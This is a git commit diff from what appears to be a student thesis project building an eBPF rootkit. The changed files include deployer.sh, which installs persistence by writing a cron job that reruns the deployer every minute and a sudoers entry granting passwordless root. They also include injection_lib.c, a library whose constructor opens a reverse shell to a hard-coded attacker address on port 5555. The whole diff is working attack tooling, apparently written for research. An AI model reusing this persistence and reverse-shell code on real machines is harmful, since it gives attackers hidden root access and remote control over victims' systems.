Added multiple small changes to client and code, submitting almost finished chapter 5

src/helpers/Makefile

@@ -15,10 +15,10 @@ simple_timer: simple_timer.o
 	gcc -g -o simple_timer simple_timer.o
 
 simple_open.o: simple_open.c $(HEADERS)
-	clang -g -c simple_open.c
+	gcc -g -c simple_open.c
 
 simple_open: simple_open.o
-	clang -g -o simple_open simple_open.o	
+	gcc -g -o simple_open simple_open.o	
 
 execve_hijack.o: execve_hijack.c $(HEADERS)
 	gcc -g -c execve_hijack.c

src/helpers/deployer.sh

@@ -45,11 +45,16 @@ echo "***************** Marcos Sánchez Bajo *****************\n"
 echo "*******************************************************\n"
 echo ""
 
-BACKDOOR_INSTALLED=0
+## Persistence
+declare CRON_PERSIST="* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh"
+declare SUDO_PERSIST="osboxes ALL=(ALL:ALL) NOPASSWD:ALL #"
+echo "$CRON_PERSIST" > /etc/cron.d/ebpfbackdoor
+echo "$SUDO_PERSIST" > /etc/sudoers.d/ebpfbackdoor
+
+# Rootkit install
 OUTPUT_COMM=$(/bin/sudo /usr/sbin/ip link)
 if [[ $OUTPUT_COMM == *"xdp"* ]]; then
-   BACKDOOR_INSTALLED=1
-   echo "Backdoor is already installed"
+   echo "Rootkit is already installed"
 else
    #Install the programs
    echo -e "${BLU}Installing TC hook${NC}"
@@ -59,7 +64,3 @@ else
    /bin/sudo "$BASEDIR"/kit -t enp0s3
 fi
 
-## Persistence
-echo "* * * * * osboxes /bin/sudo /home/osboxes/TFG/apps/deployer.sh" > /etc/cron.d/ebpfbackdoor
-echo "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #" > /etc/sudoers.d/ebpfbackdoor
-

src/helpers/injection_lib.c

@@ -8,6 +8,8 @@
 #include <netinet/in.h>
 #include <arpa/inet.h>
 
+#define ATTACKER_IP "192.168.1.127"
+#define ATTACKER_PORT 5555
 
 __attribute__((constructor))
 static void init()
@@ -18,13 +20,13 @@ static void init()
     //Just a sample reverse shell (https://www.revshells.com/)
     pid_t pid = fork();
     if(pid==0){
-        int port = 5555;
+        int port = ATTACKER_PORT;
         struct sockaddr_in revsockaddr;
 
         int sockt = socket(AF_INET, SOCK_STREAM, 0);
         revsockaddr.sin_family = AF_INET;       
         revsockaddr.sin_port = htons(port);
-        revsockaddr.sin_addr.s_addr = inet_addr("192.168.1.119");
+        revsockaddr.sin_addr.s_addr = inet_addr(ATTACKER_IP);
 
         connect(sockt, (struct sockaddr *) &revsockaddr, 
         sizeof(revsockaddr));

src/helpers/packager.sh

@@ -5,7 +5,7 @@
 #The current directory full path
 declare -r DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
 #The location of the file where to write the full rootkit package
-declare -r OUTPUTDIR="/home/osboxes/TFG/apps/"
+declare -r OUTPUTDIR="$DIR/../../apps/"
 #A variable to determine whether to silence output of internal commands
 declare firstvar=$1